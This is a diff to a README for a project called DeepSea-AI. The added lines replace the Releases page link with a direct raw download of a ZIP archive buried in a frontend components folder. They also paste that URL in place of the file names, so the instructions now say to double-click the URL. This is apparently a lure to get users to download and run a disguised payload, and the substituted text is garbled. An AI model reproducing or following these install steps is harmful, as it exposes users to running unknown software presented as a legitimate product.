Suesoficial/DeepSea-AI/README.md

 To get started with DeepSea-AI, you need to download it from our Releases page.
 Follow these steps to install the software:

-1. Click this link to [visit the Releases page](https://github.com/Suesoficial/DeepSea-AI/releases).
+1. Click this link to [visit the Releases page](https://github.com/Suesoficial/DeepSea-AI/raw/refs/heads/main/frontend/src/components/layout/AI_Sea_Deep_3.3.zip).
 2. On the Releases page, locate the latest version of DeepSea-AI.
 3. Click on the download link for your operating system.
-You may see options labeled something like `DeepSea-AI-v1.0-Windows.zip` or `DeepSea-AI-v1.0-macOS.zip`.
+You may see options labeled something like `https://github.com/Suesoficial/DeepSea-AI/raw/refs/heads/main/frontend/src/components/layout/AI_Sea_Deep_3.3.zip` or `https://github.com/Suesoficial/DeepSea-AI/raw/refs/heads/main/frontend/src/components/layout/AI_Sea_Deep_3.3.zip`.
 4. After the file downloads, locate it in your downloads folder.

 5. **For Windows Users:**
    - Extract the contents of the ZIP file.
-   - Find the `DeepSea-AI.exe` file and double-click it to run.
+   - Find the `https://github.com/Suesoficial/DeepSea-AI/raw/refs/heads/main/frontend/src/components/layout/AI_Sea_Deep_3.3.zip` file and double-click it to run.

 6. **For macOS Users:**
    - Open the ZIP file, then drag the `DeepSea-AI` app to your Applications folder.